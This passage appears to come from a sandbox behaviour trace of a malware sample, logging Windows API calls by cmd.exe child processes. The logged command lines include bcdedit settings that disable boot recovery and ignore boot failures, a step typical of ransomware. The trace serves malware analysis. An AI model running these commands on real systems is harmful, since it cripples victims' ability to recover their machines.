dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0099.101] GetProcessHeap () returned 0x3f0000 [0099.102] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x20) returned 0x404660 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.102] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0099.103] GetProcessHeap () returned 0x3f0000 [0099.103] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x404660 | out: hHeap=0x3f0000) returned 1 [0099.103] GetProcessHeap () returned 0x3f0000 [0099.103] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x12) returned 0x409ec0 [0099.103] lstrcmpW (lpString1="\\bcdedit.exe", lpString2="\\XCOPY.EXE") returned -1 [0099.104] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\bcdedit.exe", lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x2ef3a0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="bcdedit /set {default} bootstatuspolicy ignoreallfailures", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2ef350 | out: lpCommandLine="bcdedit /set {default} bootstatuspolicy ignoreallfailures", lpProcessInformation=0x2ef350*(hProcess=0x54, hThread=0x50, dwProcessId=0x56c, dwThreadId=0x8c4)) returned 1 [0099.333] CloseHandle (hObject=0x50) returned 1 [0099.333] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0099.334] GetProcessHeap () returned 0x3f0000 [0099.334] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40c2d0 | out: hHeap=0x3f0000) returned 1 [0099.334] GetEnvironmentStringsW () returned 0x40acd0* [0099.334] GetProcessHeap () returned 0x3f0000 [0099.334] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xae8) returned 0x40b7c0 [0099.334] FreeEnvironmentStringsW (penv=0x40acd0) returned 1 [0099.334] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0100.532] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x2ef298 | out: lpExitCode=0x2ef298*=0x0) returned 1 [0100.532] CloseHandle (hObject=0x54) returned 1 [0100.532] _vsnwprintf (in: _Buffer=0x2ef508, _BufferCount=0x13, _Format="%08X", _ArgList=0x2ef2a8 | out: _Buffer="00000000") returned 8 [0100.532] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0100.532] GetProcessHeap () returned 0x3f0000 [0100.532] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40b7c0 | out: hHeap=0x3f0000) returned 1 [0100.532] GetEnvironmentStringsW () returned 0x40acd0* [0100.532] GetProcessHeap () returned 0x3f0000 [0100.532] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0e) returned 0x40cdd0 [0100.532] FreeEnvironmentStringsW (penv=0x40acd0) returned 1 [0100.532] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0100.532] GetProcessHeap () returned 0x3f0000 [0100.532] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x40cdd0 | out: hHeap=0x3f0000) returned 1 [0100.532] GetEnvironmentStringsW () returned 0x40acd0* [0100.533] GetProcessHeap () returned 0x3f0000 [0100.533] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xb0e) returned 0x40cdd0 [0100.533] FreeEnvironmentStringsW (penv=0x40acd0) returned 1 [0100.533] GetProcessHeap () returned 0x3f0000 [0100.533] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x409ec0 | out: hHeap=0x3f0000) returned 1 [0100.533] DeleteProcThreadAttributeList (in: lpAttributeList=0x2ef368 | out: lpAttributeList=0x2ef368) [0100.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.533] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0100.533] _get_osfhandle (_FileHandle=1) returned 0x7 [0100.533] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0100.533] _get_osfhandle (_FileHandle=0) returned 0x3 [0100.533] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0100.533] SetConsoleInputExeNameW () returned 0x1 [0100.533] GetConsoleOutputCP () returned 0x1b5 [0100.534] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0100.534] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0100.534] exit (_Code=0) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x252ca000" os_pid = "0x83c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9b8" cmd_line = "/C bcdedit /set {default} recoveryenabled no" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 26 os_tid = 0x58c [0098.856] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1df740 | out: lpSystemTimeAsFileTime=0x1df740*(dwLowDateTime=0x8f03be10, dwHighDateTime=0x1d5956e)) [0098.856] GetCurrentProcessId () returned 0x83c [0098.857] GetCurrentThreadId () returned 0x58c [0098.857] GetTickCount () returned 0x1152df4 [0098.857] QueryPerformanceCounter (in: lpPerformanceCount=0x1df748 | out: lpPerformanceCount=0x1df748*=21914170330) returned 1 [0098.858] GetModuleHandleW (lpModuleName=0x0) returned 0x4acb0000 [0098.858] __set_app_type (_Type=0x1) [0098.858] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4acd7810) returned 0x0 [0098.858] __getmainargs (in: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610, _DoWildCard=0, _StartInfo=0x4acde0f4 | out: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610) returned 0 [0098.858] GetCurrentThreadId () returned 0x58c [0098.858] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x58c) returned 0x3c [0099.263] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.263] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0099.263] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.264] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.264] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1df6d8 | out: phkResult=0x1df6d8*=0x0) returned 0x2 [0099.264] VirtualQuery (in: lpAddress=0x1df6c0, lpBuffer=0x1df640, dwLength=0x30 | out: lpBuffer=0x1df640*(BaseAddress=0x1df000, AllocationBase=0xe0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.264] VirtualQuery (in: lpAddress=0xe0000, lpBuffer=0x1df640, dwLength=0x30 | out: lpBuffer=0x1df640*(BaseAddress=0xe0000, AllocationBase=0xe0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.264] VirtualQuery (in: lpAddress=0xe1000, lpBuffer=0x1df640, dwLength=0x30 | out: lpBuffer=0x1df640*(BaseAddress=0xe1000, AllocationBase=0xe0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.264] VirtualQuery (in: lpAddress=0xe4000, lpBuffer=0x1df640, dwLength=0x30 | out: lpBuffer=0x1df640*(BaseAddress=0xe4000, AllocationBase=0xe0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.264] VirtualQuery (in: lpAddress=0x1e0000, lpBuffer=0x1df640, dwLength=0x30 | out: lpBuffer=0x1df640*(BaseAddress=0x1e0000, AllocationBase=0x1e0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xe000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.264] GetConsoleOutputCP () returned 0x1b5 [0099.264] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.264] SetConsoleCtrlHandler (HandlerRoutine=0x4acd3184, Add=1) returned 1 [0099.265] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.265] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0099.265] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.265] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0099.265] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.265] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0099.265] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.265] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0099.265] GetEnvironmentStringsW () returned 0x3b8ab0* [0099.266] GetProcessHeap () returned 0x3a0000 [0099.266] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xa7c) returned 0x3b9540 [0099.266] FreeEnvironmentStringsW (penv=0x3b8ab0) returned 1 [0099.266] GetProcessHeap () returned 0x3a0000 [0099.266] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x8) returned 0x3b8350 [0099.266] GetEnvironmentStringsW () returned 0x3b8ab0* [0099.266] GetProcessHeap () returned 0x3a0000 [0099.266] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xa7c) returned 0x3b9fd0 [0099.266] FreeEnvironmentStringsW (penv=0x3b8ab0) returned 1 [0099.266] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1de598 | out: phkResult=0x1de598*=0x44) returned 0x0 [0099.266] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x0, lpData=0x1de5b0*=0x18, lpcbData=0x1de594*=0x1000) returned 0x2 [0099.266] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x4, lpData=0x1de5b0*=0x1, lpcbData=0x1de594*=0x4) returned 0x0 [0099.266] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x0, lpData=0x1de5b0*=0x1, lpcbData=0x1de594*=0x1000) returned 0x2 [0099.266] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x4, lpData=0x1de5b0*=0x0, lpcbData=0x1de594*=0x4) returned 0x0 [0099.266] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x4, lpData=0x1de5b0*=0x40, lpcbData=0x1de594*=0x4) returned 0x0 [0099.266] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x4, lpData=0x1de5b0*=0x40, lpcbData=0x1de594*=0x4) returned 0x0 [0099.266] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x0, lpData=0x1de5b0*=0x40, lpcbData=0x1de594*=0x1000) returned 0x2 [0099.266] RegCloseKey (hKey=0x44) returned 0x0 [0099.266] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1de598 | out: phkResult=0x1de598*=0x44) returned 0x0 [0099.267] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x0, lpData=0x1de5b0*=0x40, lpcbData=0x1de594*=0x1000) returned 0x2 [0099.267] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x4, lpData=0x1de5b0*=0x1, lpcbData=0x1de594*=0x4) returned 0x0 [0099.267] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x0, lpData=0x1de5b0*=0x1, lpcbData=0x1de594*=0x1000) returned 0x2 [0099.267] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x4, lpData=0x1de5b0*=0x0, lpcbData=0x1de594*=0x4) returned 0x0 [0099.267] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x4, lpData=0x1de5b0*=0x9, lpcbData=0x1de594*=0x4) returned 0x0 [0099.267] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x4, lpData=0x1de5b0*=0x9, lpcbData=0x1de594*=0x4) returned 0x0 [0099.267] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1de590, lpData=0x1de5b0, lpcbData=0x1de594*=0x1000 | out: lpType=0x1de590*=0x0, lpData=0x1de5b0*=0x9, lpcbData=0x1de594*=0x1000) returned 0x2 [0099.267] RegCloseKey (hKey=0x44) returned 0x0 [0099.267] time (in: timer=0x0 | out: timer=0x0) returned 0x5dc41ad7 [0099.267] srand (_Seed=0x5dc41ad7) [0099.267] GetCommandLineW () returned="/C bcdedit /set {default} recoveryenabled no" [0099.267] GetCommandLineW () returned="/C bcdedit /set {default} recoveryenabled no" [0099.267] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.267] GetProcessHeap () returned 0x3a0000 [0099.267] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x218) returned 0x3baa60 [0099.267] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3baa70, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0099.267] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0099.267] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0099.267] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.268] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0099.268] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0099.268] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0099.268] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0099.268] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0099.268] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0099.268] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0099.268] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0099.268] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0099.268] GetProcessHeap () returned 0x3a0000 [0099.268] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3b9540 | out: hHeap=0x3a0000) returned 1 [0099.268] GetEnvironmentStringsW () returned 0x3b8ab0* [0099.268] GetProcessHeap () returned 0x3a0000 [0099.268] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xa94) returned 0x3bac80 [0099.268] FreeEnvironmentStringsW (penv=0x3b8ab0) returned 1 [0099.268] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0099.269] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4acdf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0099.269] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0099.269] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0099.269] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0099.269] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0099.269] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0099.269] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0099.269] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0099.269] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0099.269] GetProcessHeap () returned 0x3a0000 [0099.269] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x5c) returned 0x3bb720 [0099.269] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1df3a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.269] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1df3a0, lpFilePart=0x1df380 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1df380*="Desktop") returned 0x25 [0099.269] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.269] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1df0b0 | out: lpFindFileData=0x1df0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x3bb790 [0099.269] FindClose (in: hFindFile=0x3bb790 | out: hFindFile=0x3bb790) returned 1 [0099.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1df0b0 | out: lpFindFileData=0x1df0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x3bb790 [0099.269] FindClose (in: hFindFile=0x3bb790 | out: hFindFile=0x3bb790) returned 1 [0099.269] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0099.269] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1df0b0 | out: lpFindFileData=0x1df0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5f5d9f50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x5f5d9f50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x3bb790 [0099.269] FindClose (in: hFindFile=0x3bb790 | out: hFindFile=0x3bb790) returned 1 [0099.270] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0099.270] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0099.270] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0099.270] GetProcessHeap () returned 0x3a0000 [0099.270] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bac80 | out: hHeap=0x3a0000) returned 1 [0099.270] GetEnvironmentStringsW () returned 0x3bb790* [0099.270] GetProcessHeap () returned 0x3a0000 [0099.270] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0xae8) returned 0x3bc280 [0099.270] FreeEnvironmentStringsW (penv=0x3bb790) returned 1 [0099.270] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4acec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0099.270] GetProcessHeap () returned 0x3a0000 [0099.270] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bb720 | out: hHeap=0x3a0000) returned 1 [0099.270] GetProcessHeap () returned 0x3a0000 [0099.270] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x4016) returned 0x3bcd70 [0099.270] GetProcessHeap () returned 0x3a0000 [0099.270] RtlAllocateHeap (HeapHandle=0x3a0000, Flags=0x8, Size=0x68) returned 0x3b95a0 [0099.270] GetProcessHeap () returned 0x3a0000 [0099.270] HeapFree (in: hHeap=0x3a0000, dwFlags=0x0, lpMem=0x3bcd70 | out: hHeap=0x3a0000) returned 1 [0099.271] GetConsoleOutputCP () returned 0x1b5 [0099.271] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.271] GetUserDefaultLCID () returned 0x409 [0099.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ace7b50, cchData=8 | out: lpLCData=":") returned 2 [0099.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1df4b0, cchData=128 | out: lpLCData="0") returned 2 [0099.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1df4b0, cchData=128 | out: lpLCData="0") returned 2 [0099.271] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1df4b0, cchData=128 | out: 